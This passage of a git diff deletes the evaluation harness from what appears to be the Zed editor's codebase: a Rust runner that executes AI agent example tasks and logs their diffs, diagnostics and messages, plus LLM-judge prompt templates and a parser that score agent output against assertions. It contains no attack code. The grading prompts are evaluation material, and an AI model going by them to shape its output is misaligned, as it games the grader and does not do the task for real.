.await?; - } - - if meta.url == ZED_REPO_URL { - std::fs::write(worktree_path.join(".rules"), std::fs::read(".rules")?)?; - } - - std::fs::create_dir_all(&self.run_directory)?; - - Ok(()) - } - - pub fn worktree_path(&self) -> PathBuf { - self.worktrees_dir - .join(self.worktree_name()) - .join(self.thread.meta().repo_name()) - } - - pub fn run(&self, app_state: Arc, cx: &mut App) -> Task> { - let project = Project::local( - app_state.client.clone(), - app_state.node_runtime.clone(), - app_state.user_store.clone(), - app_state.languages.clone(), - app_state.fs.clone(), - None, - project::LocalProjectFlags { - init_worktree_trust: false, - ..Default::default() - }, - cx, - ); - - let worktree = project.update(cx, |project, cx| { - project.create_worktree(self.worktree_path(), true, cx) - }); - - let meta = self.thread.meta(); - let this = self.clone(); - - cx.spawn(async move |cx| { - let worktree = worktree.await?; - - // Wait for worktree scan to finish before choosing a file to open. - worktree - .update(cx, |worktree, _cx| { - worktree.as_local().unwrap().scan_complete() - }) - .await; - - struct LanguageServerState { - _lsp_open_handle: OpenLspBufferHandle, - language_file_buffer: Entity, - } - - let mut diagnostics_before = None; - let mut diagnostic_summary_before = DiagnosticSummary::default(); - - let lsp = if let Some(language_server) = &meta.language_server { - // Open a file that matches the language to cause LSP to start. - let language_file = worktree - .read_with(cx, |worktree, _cx| { - worktree - .files(false, 0) - .find_map(|e| { - if e.path.clone().extension() - == Some(&language_server.file_extension) - { - Some(ProjectPath { - worktree_id: worktree.id(), - path: e.path.clone(), - }) - } else { - None - } - }) - .context("Failed to find a file for example language") - })?; - - let open_language_file_buffer_task = project.update(cx, |project, cx| { - project.open_buffer(language_file.clone(), cx) - }); - - let language_file_buffer = open_language_file_buffer_task.await?; - - let lsp_open_handle = project.update(cx, |project, cx| { - project.register_buffer_with_language_servers(&language_file_buffer, cx) - }); - - wait_for_lang_server(&project, &language_file_buffer, this.log_prefix.clone(), cx).await?; - - diagnostic_summary_before = project.read_with(cx, |project, cx| { - project.diagnostic_summary(false, cx) - }); - - diagnostics_before = query_lsp_diagnostics(project.clone(), cx).await?; - if diagnostics_before.is_some() && language_server.allow_preexisting_diagnostics { - anyhow::bail!("Example has pre-existing diagnostics. If you want to run this example regardless, set `allow_preexisting_diagnostics` to `true` in `base.toml`"); - } - - Some(LanguageServerState { - _lsp_open_handle: lsp_open_handle, - language_file_buffer, - }) - } else { - None - }; - - anyhow::ensure!(std::env::var("ZED_EVAL_SETUP_ONLY").is_err(), "Setup only mode"); - - let last_diff_file_path = this.run_directory.join("last.diff"); - - // Write an empty "last.diff" so that it can be opened in Zed for convenient view of the - // history using undo/redo. - std::fs::write(&last_diff_file_path, "")?; - - let thread = cx.update(|cx| { - //todo: Do we want to load rules files here? - let worktrees = project.read(cx).visible_worktrees(cx).map(|worktree| { - let root_name = worktree.read(cx).root_name_str().into(); - let abs_path = worktree.read(cx).abs_path(); - - WorktreeContext { - root_name, - abs_path, - rules_file: None, - } - }).collect::>(); - let project_context = cx.new(|_cx| ProjectContext::new(worktrees, vec![])); - let context_server_registry = cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - - let thread = if let Some(json) = &meta.existing_thread_json { - let session_id = acp::SessionId::new( - rand::rng() - .sample_iter(&distr::Alphanumeric) - .take(7) - .map(char::from) - .collect::(), - ); - - let db_thread = agent::DbThread::from_json(json.as_bytes()).expect("Can't read serialized thread"); - cx.new(|cx| agent::Thread::from_db(session_id, db_thread, project.clone(), project_context, context_server_registry, agent::Templates::new(), cx)) - } else { - cx.new(|cx| agent::Thread::new(project.clone(), project_context, context_server_registry, agent::Templates::new(), None, cx)) - }; - - thread.update(cx, |thread, cx| { - thread.add_default_tools(Rc::new(EvalThreadEnvironment { - project: project.clone(), - }), cx); - thread.set_profile(meta.profile_id.clone(), cx); - thread.set_model( - LanguageModelInterceptor::new( - LanguageModelRegistry::read_global(cx).default_model().expect("Missing model").model.clone(), - this.run_directory.clone(), - last_diff_file_path.clone(), - this.run_directory.join("last.messages.json"), - this.worktree_path(), - this.repo_url(), - ), - cx, - ); - }); - - thread - }); - - let mut example_cx = ExampleContext::new( - meta.clone(), - this.log_prefix.clone(), - thread.clone(), - cx.clone(), - ); - let result = this.thread.conversation(&mut example_cx).await; - - if let Err(err) = result - && !err.is::() { - return Err(err); - } - - println!("{}Stopped", this.log_prefix); - - println!("{}Getting repository diff", this.log_prefix); - let repository_diff = Self::repository_diff(this.worktree_path(), &this.repo_url()).await?; - - std::fs::write(last_diff_file_path, &repository_diff)?; - - - let mut diagnostics_after = None; - let mut diagnostic_summary_after = Default::default(); - - if let Some(language_server_state) = lsp { - wait_for_lang_server(&project, &language_server_state.language_file_buffer, this.log_prefix.clone(), cx).await?; - - println!("{}Getting diagnostics", this.log_prefix); - diagnostics_after = cx - .update(|cx| { - let project = project.clone(); - cx.spawn(async move |cx| query_lsp_diagnostics(project, cx).await) - }) - .await?; - println!("{}Got diagnostics", this.log_prefix); - - diagnostic_summary_after = project.read_with(cx, |project, cx| { - project.diagnostic_summary(false, cx) - }); - - } - - if let Some(diagnostics_before) = &diagnostics_before { - fs::write(this.run_directory.join("diagnostics_before.txt"), diagnostics_before)?; - } - - if let Some(diagnostics_after) = &diagnostics_after { - fs::write(this.run_directory.join("diagnostics_after.txt"), diagnostics_after)?; - } - - Ok(thread.update(cx, |thread, _cx| { - RunOutput { - repository_diff, - diagnostic_summary_before, - diagnostic_summary_after, - diagnostics_before, - diagnostics_after, - token_usage: thread.latest_request_token_usage().unwrap(), - tool_metrics: example_cx.tool_metrics.lock().unwrap().clone(), - thread_markdown: thread.to_markdown(), - programmatic_assertions: example_cx.assertions, - } - })) - }) - } - - async fn repository_diff(repository_path: PathBuf, repository_url: &str) -> Result { - run_git(&repository_path, &["add", "."]).await?; - let mut diff_args = vec!["diff", "--staged"]; - if repository_url == ZED_REPO_URL { - diff_args.push(":(exclude).rules"); - } - run_git(&repository_path, &diff_args).await - } - - pub async fn judge( - &self, - model: Arc, - run_output: &RunOutput, - cx: &AsyncApp, - ) -> JudgeOutput { - let mut output_file = - File::create(self.run_directory.join("judge.md")).expect("failed to create judge.md"); - - let diff_task = self.judge_diff(model.clone(), run_output, cx); - let thread_task = self.judge_thread(model.clone(), run_output, cx); - - let (diff_result, thread_result) = futures::join!(diff_task, thread_task); - - let (diff_response, diff_output) = diff_result; - let (thread_response, thread_output) = thread_result; - - writeln!( - &mut output_file, - "# Judgment\n\n## Thread\n\n{thread_response}\n\n## Diff\n\n{diff_response}", - ) - .log_err(); - - JudgeOutput { - thread: thread_output, - diff: diff_output, - } - } - - async fn judge_diff( - &self, - model: Arc, - run_output: &RunOutput, - cx: &AsyncApp, - ) -> (String, AssertionsReport) { - let diff_assertions = self.thread.diff_assertions(); - - if diff_assertions.is_empty() { - return ( - "No diff assertions".to_string(), - AssertionsReport::default(), - ); - } - - println!("{}Running diff judge", self.log_prefix); - - let judge_diff_prompt = include_str!("judge_diff_prompt.hbs"); - let judge_diff_prompt_name = "judge_diff_prompt"; - let mut hbs = Handlebars::new(); - hbs.register_template_string(judge_diff_prompt_name, judge_diff_prompt) - .unwrap(); - - let to_prompt = |assertion: String| { - hbs.render( - judge_diff_prompt_name, - &JudgeDiffInput { - repository_diff: run_output.repository_diff.clone(), - assertion, - }, - ) - .unwrap() - }; - - let (responses, report) = self - .judge_assertions(model, diff_assertions, to_prompt, cx) - .await; - - println!( - "{}Judge - Diff score: {}%", - self.log_prefix, - report.passed_percentage() - ); - - (responses, report) - } - - async fn judge_thread( - &self, - model: Arc, - run_output: &RunOutput, - cx: &AsyncApp, - ) -> (String, AssertionsReport) { - let thread_assertions = self.thread.thread_assertions(); - - if thread_assertions.is_empty() { - return ( - "No thread assertions".to_string(), - AssertionsReport::default(), - ); - } - - let judge_thread_prompt = include_str!("judge_thread_prompt.hbs"); - let judge_thread_prompt_name = "judge_thread_prompt"; - let mut hbs = Handlebars::new(); - hbs.register_template_string(judge_thread_prompt_name, judge_thread_prompt) - .unwrap(); - - let complete_messages = &run_output.thread_markdown; - let to_prompt = |assertion: String| { - hbs.render( - judge_thread_prompt_name, - &JudgeThreadInput { - messages: complete_messages.clone(), - assertion, - }, - ) - .unwrap() - }; - - let (responses, report) = self - .judge_assertions(model, thread_assertions, to_prompt, cx) - .await; - - println!( - "{}Judge - Thread score: {}%", - self.log_prefix, - report.passed_percentage() - ); - - (responses, report) - } - - async fn judge_assertions( - &self, - model: Arc, - assertions: Vec, - to_prompt: impl Fn(String) -> String, - cx: &AsyncApp, - ) -> (String, AssertionsReport) { - let assertions = assertions.into_iter().map(|assertion| { - let request = LanguageModelRequest { - thread_id: None, - prompt_id: None, - intent: None, - messages: vec![LanguageModelRequestMessage { - role: Role::User, - content: vec![MessageContent::Text(to_prompt(assertion.description))], - cache: false, - reasoning_details: None, - }], - temperature: None, - tools: Vec::new(), - tool_choice: None, - stop: Vec::new(), - thinking_allowed: true, - thinking_effort: None, - speed: None, - }; - - let model = model.clone(); - let log_prefix = self.log_prefix.clone(); - async move { - let response = send_language_model_request(model, request, cx).await; - - let (response, result) = match response { - Ok(response) => ( - response.clone(), - parse_assertion_result(&response).map_err(|err| err.to_string()), - ), - Err(err) => (err.to_string(), Err(err.to_string())), - }; - - if result.is_ok() { - println!("{}✅ {}", log_prefix, assertion.id); - } else { - println!("{}❌ {}", log_prefix, assertion.id); - } - - ( - response, - RanAssertion { - id: assertion.id, - result, - }, - ) - } - }); - - let mut responses = String::new(); - let mut report = AssertionsReport::default(); - - for (response, assertion) in future::join_all(assertions).await { - writeln!(&mut responses, "# {}", assertion.id).unwrap(); - writeln!(&mut responses, "{}\n\n", response).unwrap(); - report.ran.push(assertion); - } - - (responses, report) - } -} - -struct EvalThreadEnvironment { - project: Entity, -} - -struct EvalTerminalHandle { - terminal: Entity, -} - -impl agent::TerminalHandle for EvalTerminalHandle { - fn id(&self, cx: &AsyncApp) -> Result { - Ok(self.terminal.read_with(cx, |term, _cx| term.id().clone())) - } - - fn wait_for_exit(&self, cx: &AsyncApp) -> Result>> { - Ok(self - .terminal - .read_with(cx, |term, _cx| term.wait_for_exit())) - } - - fn current_output(&self, cx: &AsyncApp) -> Result { - Ok(self - .terminal - .read_with(cx, |term, cx| term.current_output(cx))) - } - - fn kill(&self, cx: &AsyncApp) -> Result<()> { - cx.update(|cx| { - self.terminal.update(cx, |terminal, cx| { - terminal.kill(cx); - }); - }); - Ok(()) - } - - fn was_stopped_by_user(&self, cx: &AsyncApp) -> Result { - Ok(self - .terminal - .read_with(cx, |term, _cx| term.was_stopped_by_user())) - } -} - -impl agent::ThreadEnvironment for EvalThreadEnvironment { - fn create_terminal( - &self, - command: String, - cwd: Option, - output_byte_limit: Option, - cx: &mut AsyncApp, - ) -> Task>> { - let project = self.project.clone(); - cx.spawn(async move |cx| { - let language_registry = - project.read_with(cx, |project, _cx| project.languages().clone()); - let id = acp::TerminalId::new(uuid::Uuid::new_v4().to_string()); - let terminal = - acp_thread::create_terminal_entity(command, &[], vec![], cwd.clone(), &project, cx) - .await?; - let terminal = cx.new(|cx| { - acp_thread::Terminal::new( - id, - "", - cwd, - output_byte_limit.map(|limit| limit as usize), - terminal, - language_registry, - cx, - ) - }); - Ok(Rc::new(EvalTerminalHandle { terminal }) as Rc) - }) - } - - fn create_subagent( - &self, - _label: String, - _cx: &mut App, - ) -> Result> { - unimplemented!() - } -} - -struct LanguageModelInterceptor { - model: Arc, - request_count: Arc>, - previous_diff: Arc>, - example_output_dir: PathBuf, - last_diff_file_path: PathBuf, - messages_json_file_path: PathBuf, - repository_path: PathBuf, - repository_url: String, -} - -impl LanguageModelInterceptor { - fn new( - model: Arc, - example_output_dir: PathBuf, - last_diff_file_path: PathBuf, - messages_json_file_path: PathBuf, - repository_path: PathBuf, - repository_url: String, - ) -> Arc { - Arc::new(Self { - model, - request_count: Arc::new(Mutex::new(0)), - previous_diff: Arc::new(Mutex::new("".to_string())), - example_output_dir, - last_diff_file_path, - messages_json_file_path, - repository_path, - repository_url, - }) - } -} - -impl language_model::LanguageModel for LanguageModelInterceptor { - fn id(&self) -> language_model::LanguageModelId { - self.model.id() - } - - fn name(&self) -> language_model::LanguageModelName { - self.model.name() - } - - fn provider_id(&self) -> language_model::LanguageModelProviderId { - self.model.provider_id() - } - - fn provider_name(&self) -> language_model::LanguageModelProviderName { - self.model.provider_name() - } - - fn telemetry_id(&self) -> String { - self.model.telemetry_id() - } - - fn supports_images(&self) -> bool { - self.model.supports_images() - } - - fn supports_tools(&self) -> bool { - self.model.supports_tools() - } - - fn supports_tool_choice(&self, choice: language_model::LanguageModelToolChoice) -> bool { - self.model.supports_tool_choice(choice) - } - - fn max_token_count(&self) -> u64 { - self.model.max_token_count() - } - - fn count_tokens( - &self, - request: LanguageModelRequest, - cx: &App, - ) -> future::BoxFuture<'static, Result> { - self.model.count_tokens(request, cx) - } - - fn stream_completion( - &self, - request: LanguageModelRequest, - cx: &AsyncApp, - ) -> future::BoxFuture< - 'static, - Result< - futures::stream::BoxStream< - 'static, - Result, - >, - language_model::LanguageModelCompletionError, - >, - > { - let stream = self.model.stream_completion(request.clone(), cx); - let request_count = self.request_count.clone(); - let previous_diff = self.previous_diff.clone(); - let example_output_dir = self.example_output_dir.clone(); - let last_diff_file_path = self.last_diff_file_path.clone(); - let messages_json_file_path = self.messages_json_file_path.clone(); - let repository_path = self.repository_path.clone(); - let repository_url = self.repository_url.clone(); - - Box::pin(async move { - let stream = stream.await?; - - let response_events = Arc::new(Mutex::new(Vec::new())); - let request_clone = request.clone(); - - let wrapped_stream = stream.then(move |event| { - let response_events = response_events.clone(); - let request = request_clone.clone(); - let request_count = request_count.clone(); - let previous_diff = previous_diff.clone(); - let example_output_dir = example_output_dir.clone(); - let last_diff_file_path = last_diff_file_path.clone(); - let messages_json_file_path = messages_json_file_path.clone(); - let repository_path = repository_path.clone(); - let repository_url = repository_url.clone(); - - async move { - let event_result = match &event { - Ok(ev) => Ok(ev.clone()), - Err(err) => Err(err.to_string()), - }; - response_events.lock().unwrap().push(event_result); - - let should_execute = matches!( - &event, - Ok(LanguageModelCompletionEvent::Stop { .. }) | Err(_) - ); - - if should_execute { - let current_request_count = { - let mut count = request_count.lock().unwrap(); - *count += 1; - *count - }; - - let messages_file_path = - example_output_dir.join(format!("{current_request_count}.messages.md")); - let diff_file_path = - example_output_dir.join(format!("{current_request_count}.diff")); - let last_messages_file_path = example_output_dir.join("last.messages.md"); - - let collected_events = response_events.lock().unwrap().clone(); - let request_markdown = RequestMarkdown::new(&request); - let response_events_markdown = - response_events_to_markdown(&collected_events); - let dialog = ThreadDialog::new(&request, &collected_events); - let dialog_json = - serde_json::to_string_pretty(&dialog.to_combined_request()) - .unwrap_or_default(); - - let messages = format!( - "{}\n\n{}", - request_markdown.messages, response_events_markdown - ); - fs::write(&messages_file_path, messages.clone()) - .expect("failed to write messages file"); - fs::write(&last_messages_file_path, messages) - .expect("failed to write last messages file"); - fs::write(&messages_json_file_path, dialog_json) - .expect("failed to write last.messages.json"); - - // Get repository diff - let diff_result = - ExampleInstance::repository_diff(repository_path, &repository_url) - .await; - - match diff_result { - Ok(diff) => { - let prev_diff = previous_diff.lock().unwrap().clone(); - if diff != prev_diff { - fs::write(&diff_file_path, &diff) - .expect("failed to write diff file"); - fs::write(&last_diff_file_path, &diff) - .expect("failed to write last diff file"); - *previous_diff.lock().unwrap() = diff; - } - } - Err(err) => { - let error_message = format!("{err:?}"); - fs::write(&diff_file_path, &error_message) - .expect("failed to write diff error to file"); - fs::write(&last_diff_file_path, &error_message) - .expect("failed to write last diff file"); - } - } - - if current_request_count == 1 { - let tools_file_path = example_output_dir.join("tools.md"); - fs::write(tools_file_path, request_markdown.tools) - .expect("failed to write tools file"); - } - } - - event - } - }); - - Ok(Box::pin(wrapped_stream) - as futures::stream::BoxStream< - 'static, - Result< - LanguageModelCompletionEvent, - language_model::LanguageModelCompletionError, - >, - >) - }) - } -} - -pub fn wait_for_lang_server( - project: &Entity, - buffer: &Entity, - log_prefix: String, - cx: &mut AsyncApp, -) -> Task> { - if std::env::var("ZED_EVAL_SKIP_LS").is_ok() { - return Task::ready(Ok(())); - } - - println!("{}⏵ Waiting for language server", log_prefix); - - let (mut tx, mut rx) = mpsc::channel(1); - - let lsp_store = project.read_with(cx, |project, _| project.lsp_store()); - - let has_lang_server = buffer.update(cx, |buffer, cx| { - lsp_store.update(cx, |lsp_store, cx| { - lsp_store - .running_language_servers_for_local_buffer(buffer, cx) - .next() - .is_some() - }) - }); - - if has_lang_server { - project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .detach(); - } - - let subscriptions = - [ - cx.subscribe(&lsp_store, { - let log_prefix = log_prefix.clone(); - move |_, event, _| { - if let project::LspStoreEvent::LanguageServerUpdate { - message: - client::proto::update_language_server::Variant::WorkProgress( - LspWorkProgress { - message: Some(message), - .. - }, - ), - .. - } = event - { - println!("{}⟲ {message}", log_prefix) - } - } - }), - cx.subscribe(project, { - let buffer = buffer.clone(); - move |project, event, cx| match event { - project::Event::LanguageServerAdded(_, _, _) => { - let buffer = buffer.clone(); - project - .update(cx, |project, cx| project.save_buffer(buffer, cx)) - .detach(); - } - project::Event::DiskBasedDiagnosticsFinished { .. } => { - tx.try_send(()).ok(); - } - _ => {} - } - }), - ]; - - cx.spawn(async move |cx| { - let timeout = cx.background_executor().timer(Duration::new(60 * 5, 0)); - let result = futures::select! { - _ = rx.next() => { - println!("{}⚑ Language server idle", log_prefix); - anyhow::Ok(()) - }, - _ = timeout.fuse() => { - anyhow::bail!("LSP wait timed out after 5 minutes"); - } - }; - drop(subscriptions); - result - }) -} - -pub async fn query_lsp_diagnostics( - project: Entity, - cx: &mut AsyncApp, -) -> Result> { - let paths_with_diagnostics = project.update(cx, |project, cx| { - project - .diagnostic_summaries(true, cx) - .filter(|(_, _, summary)| summary.error_count > 0 || summary.warning_count > 0) - .map(|(project_path, _, _)| project_path) - .collect::>() - }); - - if paths_with_diagnostics.is_empty() { - return Ok(None); - } - - let mut output = String::new(); - for project_path in paths_with_diagnostics { - let buffer = project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await?; - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - - for (_, group) in snapshot.diagnostic_groups(None) { - let entry = &group.entries[group.primary_ix]; - let range = entry.range.to_point(&snapshot); - let severity = match entry.diagnostic.severity { - DiagnosticSeverity::ERROR => "error", - DiagnosticSeverity::WARNING => "warning", - _ => continue, - }; - - writeln!( - output, - "{} at line {}: {}", - severity, - range.start.row + 1, - entry.diagnostic.message - )?; - } - } - anyhow::Ok(Some(output)) -} - -fn parse_assertion_result(response: &str) -> Result { - let analysis = get_tag("analysis", response)?; - let passed = match get_tag("passed", response)?.to_lowercase().as_str() { - "true" => true, - "false" => false, - value @ _ => bail!("invalid judge `passed` tag: {value}"), - }; - Ok(RanAssertionResult { - analysis: Some(analysis), - passed, - }) -} - -fn get_tag(name: &'static str, response: &str) -> Result { - let start_tag = format!("<{}>", name); - let end_tag = format!("", name); - - let start_ix = response - .find(&start_tag) - .context(format!("{} start tag not found", name))?; - let content_start_ix = start_ix + start_tag.len(); - - let end_ix = content_start_ix - + response[content_start_ix..] - .find(&end_tag) - .context(format!("{} end tag not found", name))?; - - let content = response[content_start_ix..end_ix].trim().unindent(); - - anyhow::Ok(content) -} - -pub fn repo_path_for_url(repos_dir: &Path, repo_url: &str) -> PathBuf { - let repo_name = repo_url - .trim_start_matches("https://") - .replace(|c: char| !c.is_alphanumeric(), "-"); - Path::new(repos_dir).join(repo_name) -} - -pub async fn run_git(repo_path: &Path, args: &[&str]) -> Result { - let output = new_command("git") - .current_dir(repo_path) - .args(args) - .output() - .await?; - - anyhow::ensure!( - output.status.success(), - "`git {}` within `{}` failed with status: {}\nstderr:\n{}\nstdout:\n{}", - args.join(" "), - repo_path.display(), - output.status, - String::from_utf8_lossy(&output.stderr), - String::from_utf8_lossy(&output.stdout), - ); - Ok(String::from_utf8(output.stdout)?.trim().to_string()) -} - -fn push_role(role: &Role, buf: &mut String, assistant_message_number: &mut u32) { - match role { - Role::System => buf.push_str("# ⚙️ SYSTEM\n\n"), - Role::User => buf.push_str("# 👤 USER\n\n"), - Role::Assistant => { - buf.push_str(&format!("# 🤖 ASSISTANT {assistant_message_number}\n\n")); - *assistant_message_number = *assistant_message_number + 1; - } - } -} - -pub async fn send_language_model_request( - model: Arc, - request: LanguageModelRequest, - cx: &AsyncApp, -) -> anyhow::Result { - match model.stream_completion_text(request, cx).await { - Ok(mut stream) => { - let mut full_response = String::new(); - while let Some(chunk_result) = stream.stream.next().await { - match chunk_result { - Ok(chunk_str) => { - full_response.push_str(&chunk_str); - } - Err(err) => { - anyhow::bail!("Error receiving response from language model: {err}"); - } - } - } - Ok(full_response) - } - Err(err) => Err(anyhow!( - "Failed to get response from language model. Error was: {err}" - )), - } -} - -pub struct RequestMarkdown { - pub tools: String, - pub messages: String, -} - -impl RequestMarkdown { - pub fn new(request: &LanguageModelRequest) -> Self { - let mut tools = String::new(); - let mut messages = String::new(); - let mut assistant_message_number: u32 = 1; - - // Print the tools - if !request.tools.is_empty() { - for tool in &request.tools { - write!(&mut tools, "# {}\n\n", tool.name).unwrap(); - write!(&mut tools, "{}\n\n", tool.description).unwrap(); - writeln!( - &mut tools, - "{}", - MarkdownCodeBlock { - tag: "json", - text: &format!("{:#}", tool.input_schema) - } - ) - .unwrap(); - } - } - - // Print the messages - for message in &request.messages { - push_role(&message.role, &mut messages, &mut assistant_message_number); - - for content in &message.content { - match content { - MessageContent::Text(text) => { - messages.push_str(text); - messages.push_str("\n\n"); - } - MessageContent::Image(_) => { - messages.push_str("[IMAGE DATA]\n\n"); - } - MessageContent::Thinking { text, signature } => { - messages.push_str("**Thinking**:\n\n"); - if let Some(sig) = signature { - messages.push_str(&format!("Signature: {}\n\n", sig)); - } - messages.push_str(text); - messages.push_str("\n"); - } - MessageContent::RedactedThinking(items) => { - messages.push_str(&format!( - "**Redacted Thinking**: {} item(s)\n\n", - items.len() - )); - } - MessageContent::ToolUse(tool_use) => { - messages.push_str(&format!( - "**Tool Use**: {} (ID: {})\n", - tool_use.name, tool_use.id - )); - messages.push_str(&format!( - "{}\n", - MarkdownCodeBlock { - tag: "json", - text: &format!("{:#}", tool_use.input) - } - )); - } - MessageContent::ToolResult(tool_result) => { - messages.push_str(&format!( - "**Tool Result**: {} (ID: {})\n\n", - tool_result.tool_name, tool_result.tool_use_id - )); - if tool_result.is_error { - messages.push_str("**ERROR:**\n"); - } - - match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - writeln!(messages, "{text}\n").ok(); - } - LanguageModelToolResultContent::Image(image) => { - writeln!(messages, "![Image](data:base64,{})\n", image.source).ok(); - } - } - - if let Some(output) = tool_result.output.as_ref() { - writeln!( - messages, - "**Debug Output**:\n\n```json\n{}\n```\n", - serde_json::to_string_pretty(output).unwrap() - ) - .unwrap(); - } - } - } - } - } - - Self { tools, messages } - } -} - -pub fn response_events_to_markdown( - response_events: &[std::result::Result], -) -> String { - let mut response = String::new(); - // Print the response events if any - response.push_str("# Response\n\n"); - let mut text_buffer = String::new(); - let mut thinking_buffer = String::new(); - - let flush_buffers = - |output: &mut String, text_buffer: &mut String, thinking_buffer: &mut String| { - if !text_buffer.is_empty() { - output.push_str(&format!("**Text**:\n{}\n\n", text_buffer)); - text_buffer.clear(); - } - if !thinking_buffer.is_empty() { - output.push_str(&format!("**Thinking**:\n{}\n\n", thinking_buffer)); - thinking_buffer.clear(); - } - }; - - for event in response_events { - match event { - Ok(LanguageModelCompletionEvent::Text(text)) => { - text_buffer.push_str(text); - } - Ok(LanguageModelCompletionEvent::Thinking { text, .. }) => { - thinking_buffer.push_str(text); - } - Ok(LanguageModelCompletionEvent::RedactedThinking { .. }) => {} - Ok(LanguageModelCompletionEvent::Stop(reason)) => { - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - response.push_str(&format!("**Stop**: {:?}\n\n", reason)); - } - Ok(LanguageModelCompletionEvent::ToolUse(tool_use)) => { - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - response.push_str(&format!( - "**Tool Use**: {} (ID: {})\n", - tool_use.name, tool_use.id - )); - response.push_str(&format!( - "{}\n", - MarkdownCodeBlock { - tag: "json", - text: &format!("{:#}", tool_use.input) - } - )); - } - Ok( - LanguageModelCompletionEvent::UsageUpdate(_) - | LanguageModelCompletionEvent::StartMessage { .. } - | LanguageModelCompletionEvent::Queued { .. } - | LanguageModelCompletionEvent::Started - | LanguageModelCompletionEvent::ReasoningDetails(_), - ) => {} - Ok(LanguageModelCompletionEvent::ToolUseJsonParseError { - json_parse_error, .. - }) => { - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - response.push_str(&format!( - "**Error**: parse error in tool use JSON: {}\n\n", - json_parse_error - )); - } - Err(error) => { - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - response.push_str(&format!("**Error**: {}\n\n", error)); - } - } - } - - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - - response -} - -#[derive(Clone, Debug, Serialize, Deserialize, PartialEq)] -pub struct ThreadDialog { - pub request: LanguageModelRequest, - pub response_events: Vec>, -} - -impl ThreadDialog { - pub fn new( - request: &LanguageModelRequest, - response_events: &[std::result::Result], - ) -> Self { - Self { - request: request.clone(), - response_events: response_events.to_vec(), - } - } - - /// Represents all request and response messages in a unified format. - /// - /// Specifically, it appends the assistant's response (derived from response events) - /// as a new message to existing messages in the request. - pub fn to_combined_request(&self) -> LanguageModelRequest { - let mut request = self.request.clone(); - if let Some(assistant_message) = self.response_events_to_message() { - request.messages.push(assistant_message); - } - request - } - fn response_events_to_message(&self) -> Option { - let response_events = &self.response_events; - let mut content: Vec = Vec::new(); - let mut current_text = String::new(); - - let flush_text = |text: &mut String, content: &mut Vec| { - if !text.is_empty() { - content.push(MessageContent::Text(std::mem::take(text))); - } - }; - - for event in response_events { - match event { - Ok(LanguageModelCompletionEvent::Text(text)) => { - current_text.push_str(text); - } - - Ok(LanguageModelCompletionEvent::ToolUse(tool_use)) => { - flush_text(&mut current_text, &mut content); - if tool_use.is_input_complete { - content.push(MessageContent::ToolUse(tool_use.clone())); - } - } - Ok(LanguageModelCompletionEvent::Thinking { text, signature }) => { - flush_text(&mut current_text, &mut content); - content.push(MessageContent::Thinking { - text: text.clone(), - signature: signature.clone(), - }); - } - - // Skip these - Ok(LanguageModelCompletionEvent::UsageUpdate(_)) - | Ok(LanguageModelCompletionEvent::RedactedThinking { .. }) - | Ok(LanguageModelCompletionEvent::StartMessage { .. }) - | Ok(LanguageModelCompletionEvent::ReasoningDetails(_)) - | Ok(LanguageModelCompletionEvent::Stop(_)) - | Ok(LanguageModelCompletionEvent::Queued { .. }) - | Ok(LanguageModelCompletionEvent::Started) => {} - - Ok(LanguageModelCompletionEvent::ToolUseJsonParseError { - json_parse_error, - .. - }) => { - flush_text(&mut current_text, &mut content); - content.push(MessageContent::Text(format!( - "ERROR: parse error in tool use JSON: {}", - json_parse_error - ))); - } - - Err(error) => { - flush_text(&mut current_text, &mut content); - content.push(MessageContent::Text(format!("ERROR: {}", error))); - } - } - } - - flush_text(&mut current_text, &mut content); - - if !content.is_empty() { - Some(LanguageModelRequestMessage { - role: Role::Assistant, - content, - cache: false, - reasoning_details: None, - }) - } else { - None - } - } -} - -#[cfg(test)] -mod test { - use super::*; - - #[test] - fn test_parse_judge_output() { - let response = r#" - The model did a good job but there were still compilations errors. - true - "# - .unindent(); - - let output = parse_assertion_result(&response).unwrap(); - assert_eq!( - output.analysis, - Some("The model did a good job but there were still compilations errors.".into()) - ); - assert!(output.passed); - - let response = r#" - Text around ignored - - - Failed to compile: - - Error 1 - - Error 2 - - - false - "# - .unindent(); - - let output = parse_assertion_result(&response).unwrap(); - assert_eq!( - output.analysis, - Some("Failed to compile:\n- Error 1\n- Error 2".into()) - ); - assert!(!output.passed); - } -} diff --git a/crates/eval/src/judge_diff_prompt.hbs b/crates/eval/src/judge_diff_prompt.hbs deleted file mode 100644 index 24ef9ac97e389ab5a3059eead27727343786cb1b..0000000000000000000000000000000000000000 --- a/crates/eval/src/judge_diff_prompt.hbs +++ /dev/null @@ -1,25 +0,0 @@ -You are an expert software developer. Your task is to evaluate a diff produced by an AI agent -in response to a prompt. Here is the prompt and the diff: - - -{{{prompt}}} - - - -{{{repository_diff}}} - - -Evaluate whether or not the diff passes the following assertion: - - -{{assertion}} - - -Analyze the diff hunk by hunk, and structure your answer in the following XML format: - -``` -{YOUR ANALYSIS HERE} -{PASSED_ASSERTION} -``` - -Where `PASSED_ASSERTION` is either `true` or `false`. diff --git a/crates/eval/src/judge_thread_prompt.hbs b/crates/eval/src/judge_thread_prompt.hbs deleted file mode 100644 index e80bafcce1f46ddddb236e572b27f51960a5a223..0000000000000000000000000000000000000000 --- a/crates/eval/src/judge_thread_prompt.hbs +++ /dev/null @@ -1,21 +0,0 @@ -You are an expert software developer. -Your task is to evaluate an AI agent's messages and tool calls in this conversation: - - -{{{messages}}} - - -Evaluate whether or not the sequence of messages passes the following assertion: - - -{{{assertion}}} - - -Analyze the messages one by one, and structure your answer in the following XML format: - -``` -{YOUR ANALYSIS HERE} -{PASSED_ASSERTION} -``` - -Where `PASSED_ASSERTION` is either `true` or `false`. diff --git a/crates/eval/src/tool_metrics.rs b/crates/eval/src/tool_metrics.rs deleted file mode 100644 index 63d8a4f2bc4d1be477a81e92aa2a68683f9d6434..0000000000000000000000000000000000000000 --- a/crates/eval/src/tool_metrics.rs +++ /dev/null @@ -1,106 +0,0 @@ -use collections::HashMap; -use serde::{Deserialize, Serialize}; -use std::{fmt::Display, 